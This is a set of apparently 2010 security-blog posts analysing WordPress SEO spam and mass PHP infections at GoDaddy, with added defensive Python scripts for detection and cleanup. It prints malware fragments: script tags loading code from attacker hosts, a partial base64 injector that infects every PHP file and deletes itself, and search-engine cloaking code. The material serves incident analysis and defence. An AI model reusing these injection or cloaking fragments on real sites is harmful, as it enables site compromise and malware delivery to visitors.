SEO SPAM network – Code used and more details

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected and the common complaint I hear is that even after they clean up the spam, it just “magically” reappears after a few days.

Infection and analysis

*This is important: the latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and the attackers left a backdoor in there. So you need to find where it is.


SEO SPAM network – Details of the wp-includes infection

We have been digging lately in a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on WordPress web sites.

Sites compromised.

The list is big. Some of the ones that caught my eye were:

Mindtouch.com (Popular open source product)
chapters.asmconline.org (American Society of Military Comptrollers)
blog.woodward.edu (university)
content.hks.harvard.edu (university)
cima.ned.org (National Endowment for Democracy)
scripts.mit.edu
web.mit.edu
badminton.mit.edu
people.oregonstate.edu
whi.wts.edu
blogs.hartwick.edu
virtualcms.net

And the list goes on and on and on…

XSS on oswd.org (Open source Web design) used by spammers

http://www.oswd.org/ (Open Source Web Design) is a popular web site used for sharing templates and web designs. They have a strong and active community, and we have actually used it in the past when looking for templates.

However, lately we started to notice a lot of spammers using the oswd.org site to host their content. Instead of linking to a Viagra or Cialis web site, they were linking directly to random oswd profiles. For example:

http://www.oswd.org/user/profile/id/52781 or
http://www.oswd.org/user/profile/id/52780 or
http://www.oswd.org/user/profile/id/52792

*There are hundreds of profiles within the 526-528 range being used for that. If you search on twitter for “user profile” “oswd” you will find a bunch as well.

Here we go again – Problem at GoDaddy continues

Update from GoDaddy: fewer than 200 accounts were hacked this morning, as they were able to contain it before it spread. In their own words:

Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning.

Go Daddy is working with other top hosting providers and security experts to gather information to stop the criminals initiating these exploits.

We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.

As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.

Thank you, Todd Redfoot, Chief Information Security Officer

Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.

All the sites at the Walmart Community network hacked

We posted a few weeks ago that the main site for the Walmart community network was hacked. Well, the problem is a lot bigger than that.

They have web sites for different cities and most of them are hacked too. For example:

  • http://arkansas.walmartcommunity.com/ (65.61.140.162) – SEO spam
  • http://florida.walmartcommunity.com (65.61.167.225) – SEO spam (only visible to Google)
  • http://chicago.walmartcommunity.com (65.61.140.161) – SEO spam
  • http://chicago.walmartcommunity.com/wp-includes/8pmax/ – Fake AV (when coming from Google)
  • http://philadelphia.walmartcommunity.com/ (65.61.167.225) – SEO spam

And probably every one of them is, since I only checked the ones linked from their front page. They are all running WordPress 2.8.4, hosted at Rackspace and configured the same way.


Lean.mit.edu hacked and serving spam

Interested in Viagra, Cialis and some other “magical” medications? It seems that the MIT web site for the Lean Advancement Initiative (http://lean.mit.edu/ ) knows a bit about it:


Joking aside, they got hacked and are being used to serve a lot of SPAM. In fact, we were fixing a web site that had a lot of links to it:

original viagra bestellen 
original viagra rezeptfrei
viagra droga generica
..
viagra verpackung
cialis filmtabletten
viagra kaufen test
viagra original preis
günstig viagra

The script is also a bit clever: if you visit it without any argument, it returns a 404 (try http://lean.mit.edu/blind/products/lesat/lesat.php ).
If you visit it with an argument, it shows the spam (try http://lean.mit.edu/blind/products/lesat/lesat.php?pills=bestellen-viagra ).


Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src="http://losotrana.com/js.php"></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far are hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they have not been able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same IP address as holasionweb.com, the domain used in the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from 178.32.42.1, which is also faking a Googlebot user-agent string (the last field of the log line below):

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am happy with this response, and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important and hopefully when they find out what happened they will do a full case study so we can all learn from that (or am I dreaming too much?)

It is not over – SEO Spam on sites infected

Did your site get hacked in the last 3 or 4 weeks? If it did, you may still have some things to clean up.

Lately we started to notice, on a lot of the sites we have been fixing, a “.files” directory full of spam links. We initially thought it was an isolated incident, but it became more frequent, so we decided to put our scanner to work to see how many we could find.

So far we have a list of more than a thousand sites with it (1,125 sites, to be exact). These are just the sites we have scanned in the last few hours, so the real number is probably much bigger. Our list also includes sites from all major hosting companies and all web applications, so this is not specific to one company or tool.

How do you find out if you are still infected? Via FTP, just list the .files directory in your web root:

.files$ ls
1 in 5 divorces refers to facebook.html
2000 year old man.html
2009 kennedy center honorees.html
2009 pro bowl.html
..
2009 pro bowl roster.html
2009 pro bowl selections.html
2010 nfl pro bowl selections.html

You will see hundreds of files in there. Via a browser, just visit http://yoursite.com/.files/

If you see a directory listing full of links you don’t know about, it means that you are still infected.

For people using our scanner, it has been alerting about this for a little while, so you have been (or will soon be) notified.

Now, you may ask: why were these files added? They are used as an SEO spam tactic to increase the page rank of the attackers' sites.

They are used in conjunction with this code (labelled MW:SPAM:S2), which reads the content of the file only if the request comes from a search engine:

function get_page($key){
  $f_n=".files/".$key.".html";
  if (@file_exists($f_n)) return @file_get_contents($f_n);
}

Code to check if it comes from a search engine:

$ip=sprintf("%u",ip2long($_SERVER["REMOTE_ADDR"]));
if (($ip>=3639549952)&&($ip<=3639558143))$searchengine=1; //GOOGLE (216.239.32.0-216.239.63.255)
if (($ip>=1123631104)&&($ip<=1123639295))$searchengine=1; //GOOGLE (66.249.64.0-66.249.95.255)
if (($ip>=1089052672)&&($ip<=1089060863))$searchengine=1; //GOOGLE (64.233.160.0-64.233.191.255)
if (($ip>=1078218752)&&($ip<=1078220799))$searchengine=1; //GOOGLE (64.68.80.0-64.68.87.255)
if (($ip>=1078220802)&&($ip<=1078222031))$searchengine=1; //GOOGLE (64.68.88.2-64.68.92.207)
if (($ip>=1087381508)&&($ip<=1087382952))$searchengine=1; //GOOGLE (64.208.32.4-64.208.37.168)
if (($ip>=3512041472)&&($ip<=3512045567))$searchengine=1; //GOOGLE (209.85.128.0-209.85.143.255)
if (($ip>=1113980928)&&($ip<=1113985023))$searchengine=1; //GOOGLE (66.102.0.0-66.102.15.255)
if (($ip>=1208926208)&&($ip<=1208942591))$searchengine=1; //GOOGLE (72.14.192.0-72.14.255.255)
if (($ip>=1249705984)&&($ip<=1249771519))$searchengine=1; //GOOGLE (74.125.0.0-74.125.255.255)
if (stristr($_SERVER["HTTP_USER_AGENT"],"msnbot")||stristr($_SERVER["HTTP_USER_AGENT"],"Yahoo"))$searchengine=1;
if (stristr($_SERVER["HTTP_USER_AGENT"],"via translate.google.com"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google WAP Proxy"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google CHTML Proxy"))$searchengine=0;

If a normal user visits it, they are just redirected to cnn.com and won’t notice anything wrong with the site.
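The cloaking logic above (serve spam only to search engines) and the fake-Googlebot log line from the GoDaddy post earlier on this page are two sides of the same trick. The following is an added example, not code from the original post: it reproduces the malware's search-engine decision in Python so a defender can see exactly which visitors would have been served the spam, and it scans access-log lines for requests that claim a Googlebot user agent from an IP outside the ranges hard-coded in that script. The Google ranges are copied from the malware's own list above (2010 data, not authoritative today); the log format and the sample lines are constructed for the example. Google's documented way to verify a crawler is a reverse DNS lookup followed by a forward lookup of the returned name, which this offline example does not perform.

```python
import ipaddress
import re

# Google ranges exactly as hard-coded in the cloaking script above (2010 data,
# not authoritative now); used only to reproduce the malware's decision.
GOOGLE_RANGES_2010 = [
    ("216.239.32.0", "216.239.63.255"),
    ("66.249.64.0", "66.249.95.255"),
    ("64.233.160.0", "64.233.191.255"),
    ("64.68.80.0", "64.68.87.255"),
    ("64.68.88.2", "64.68.92.207"),
    ("64.208.32.4", "64.208.37.168"),
    ("209.85.128.0", "209.85.143.255"),
    ("66.102.0.0", "66.102.15.255"),
    ("72.14.192.0", "72.14.255.255"),
    ("74.125.0.0", "74.125.255.255"),
]


def ip_in_listed_google_range(ip):
    """Same inclusive comparison the PHP does on sprintf('%u', ip2long($ip))."""
    n = int(ipaddress.IPv4Address(ip))
    return any(int(ipaddress.IPv4Address(lo)) <= n <= int(ipaddress.IPv4Address(hi))
               for lo, hi in GOOGLE_RANGES_2010)


def looks_like_search_engine(ip, user_agent):
    """Reproduce the cloaking script's decision: True means the spam page is served.
    Order matters, as in the PHP: IP ranges first, then msnbot/Yahoo override to 1,
    then the Google proxy/translate user agents override to 0."""
    se = ip_in_listed_google_range(ip)
    ua = user_agent.lower()
    if "msnbot" in ua or "yahoo" in ua:
        se = True
    for proxy in ("via translate.google.com", "google wap proxy", "google chtml proxy"):
        if proxy in ua:
            se = False
    return se


# Combined log format: ip ... "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\d+\.\d+\.\d+\.\d+) .*?"(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)


def flag_fake_googlebot(log_lines):
    """Return (ip, request) for every request whose user agent claims to be
    Googlebot but whose source IP is outside the listed Google ranges."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if "googlebot" not in m.group("ua").lower():
            continue
        if not ip_in_listed_google_range(m.group("ip")):
            hits.append((m.group("ip"), m.group("req")))
    return hits


# Constructed sample log lines (not a real capture). The first one mirrors the
# request and user agent shown in the GoDaddy post above.
SAMPLE_LOG = [
    '178.32.42.1 - - [20/May/2010:10:00:00 +0000] "GET /simple_production.php HTTP/1.1" 200 57 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.66.1 - - [20/May/2010:10:00:01 +0000] "GET / HTTP/1.1" 200 1234 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.5 - - [20/May/2010:10:00:02 +0000] "GET / HTTP/1.1" 200 1234 "-" '
    '"Mozilla/5.0 (Windows; U; Windows NT 5.1)"',
]

if __name__ == "__main__":
    for ip, req in flag_fake_googlebot(SAMPLE_LOG):
        print("fake Googlebot from %s: %s" % (ip, req))
```

Run against a real access log, the same check is a cheap way to spot the injector's requests described earlier: a Googlebot user agent from an unexpected source is a strong signal worth a reverse-DNS confirmation.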

Clean up:

If you have this .files directory, go ahead and remove it. Also search your web root for a PHP file with a random name containing a big base64 string, and remove it as well.
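The two cleanup indicators just given (a .files directory, and a randomly named PHP file holding a large base64 blob) are easy to check mechanically. The following is an added example and not the post's or Sucuri's scanner: it walks a web root and reports both indicators. The base64 length threshold and the eval(base64_decode(...)) pattern are assumptions chosen for this example, and the demo site it builds is constructed, not real data.

```python
import base64
import os
import re
import tempfile

# Heuristic from the post: a PHP file carrying a large base64 string. The
# threshold is an assumption for this example; tune it for your site.
MIN_B64_LEN = 200
B64_RE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_B64_LEN)
# Also flag the eval(base64_decode(...)) wrapper seen in the injector later on this page.
EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def scan_webroot(root):
    """Return sorted (kind, path) findings:
    'spam_dir' for a .files directory, 'b64_php' for a PHP file with a long
    base64 blob or an eval(base64_decode(...)) call."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d == ".files":
                findings.append(("spam_dir", os.path.join(dirpath, d)))
        for f in filenames:
            if not f.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, f)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue
            if EVAL_RE.search(data) or B64_RE.search(data):
                findings.append(("b64_php", path))
    return sorted(findings)


def build_demo_site():
    """Constructed sample web root (not real data): one clean PHP file, one
    .files directory with a spam page, one randomly named PHP file wrapping a
    long base64 blob in eval(base64_decode(...))."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, ".files"))
    with open(os.path.join(root, ".files", "2009 pro bowl.html"), "w") as fh:
        fh.write("<a href='http://spam.example.invalid/'>spam</a>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    blob = base64.b64encode(b"placeholder payload " * 20).decode("ascii")
    with open(os.path.join(root, "x7k2q.php"), "w") as fh:
        fh.write('<?php eval(base64_decode("%s")); ?>\n' % blob)
    return root


if __name__ == "__main__":
    for kind, path in scan_webroot(build_demo_site()):
        print(kind, path)
```

Treat the b64_php hits as leads rather than verdicts: legitimate code sometimes embeds long base64 strings (inline images, bundled libraries), so compare each hit against a clean copy of the application before deleting it.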

*If anyone wants the list of sites (for research purposes only), let me know.

**By the way, this has nothing to do with GoDaddy. My list includes sites from all major hosting companies.


Found code used to inject the malware at GoDaddy

Update: Reply from GoDaddy: http://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

While GoDaddy was busy blaming its users, one of our friends, Kevin Reville, got tired of getting hacked and set up a cron script to monitor his site and alert him when new files were added.

What did he find? The malware used by the attackers to infect everyone.

Just to be clear: this has nothing to do with WordPress. In fact, on one site we were monitoring, nothing related to WordPress got logged, except this script being called and then deleted. We also saw Joomla sites and many other web applications getting hacked.

So what is going on? The attackers are able to create this single PHP file on all the sites and then remotely execute it to infect everything. Once it is done, the script deletes itself.

Analysis:

The script in this case was called "simple_production.php" (but we have heard reports of different names being used). It is a base64-encoded file that looks like this (see it in full: MW:SIPRO:1):

eval(base64_decode("DQpzZXRfdGltZV9saW1pdCgwKTsNCg0KDQpmdW5jdGlvbiBpbmplY3....

Decoded, this is what it does (see the full content here):

1-First, it removes itself:

$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);

2-Encodes the JavaScript payload (the space in "< script" is there to keep it from rendering):

$cod=base64_encode('< script src="http://holasionweb.com/oo.php">
$to_pack='if(function_exists(\'ob_start\')&&!isset($GLOBALS[\'mr_n..

3-Scans all directories and adds the malware to every PHP file. After that, it prints the number of infected files and exits:

$val=dirname($z);
$totalinjected=0;
echo "Working with $val\n";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";

So a simple PHP script is doing all this mess. The question now is how they are able to place this file on all those sites at GoDaddy. Permissions on most of the sites we checked were correct, and it is not a web application bug. What is left is an internal problem at GoDaddy.
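The behaviour described above (a dropper appears, every PHP file is modified, the dropper deletes itself) is exactly what the cron-based monitoring mentioned at the top of this post catches. The following is an added example, not Kevin Reville's script or anything from the post: it takes a hash snapshot of a directory tree, diffs two snapshots into added/removed/modified sets, and re-enacts the sequence in a temporary directory with a harmless placeholder tag instead of the real payload. The directory layout and file contents are constructed for the example.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map relative path -> sha256 of content for every file under root."""
    state = {}
    for dirpath, _, filenames in os.walk(root):
        for f in filenames:
            path = os.path.join(dirpath, f)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            state[os.path.relpath(path, root)] = h.hexdigest()
    return state


def diff_snapshots(before, after):
    """Classify every path as added, removed or modified between two snapshots."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def simulate_injection(root):
    """Constructed re-enactment of the sequence in the post: a dropper appears,
    a placeholder script tag is appended to every other PHP file, the dropper
    unlinks itself. The tag points at a reserved .invalid name, not real malware."""
    dropper = os.path.join(root, "simple_production.php")
    with open(dropper, "w") as fh:
        fh.write("<?php /* placeholder dropper */ ?>\n")
    for dirpath, _, filenames in os.walk(root):
        for f in filenames:
            if f.endswith(".php") and f != "simple_production.php":
                with open(os.path.join(dirpath, f), "a") as fh:
                    fh.write('<script src="http://malware.example.invalid/js.php"></script>\n')
    os.unlink(dropper)


def demo():
    """Build a constructed clean site, baseline it, run the re-enactment, and
    return what a periodic monitor would report."""
    root = tempfile.mkdtemp(prefix="site_")
    for name in ("index.php", "about.php", "style.css"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("/* clean */\n")
    baseline = snapshot(root)
    simulate_injection(root)
    return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Because the dropper removes itself, a monitor that only compares against the previous run will usually see modified PHP files but no added file; keep the baseline from a known-clean state rather than rolling it forward, and alert on any change to files that should never change between deployments.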

If you are a GoDaddy customer that got hacked, send this link to them. Let’s hope for a good response this time.
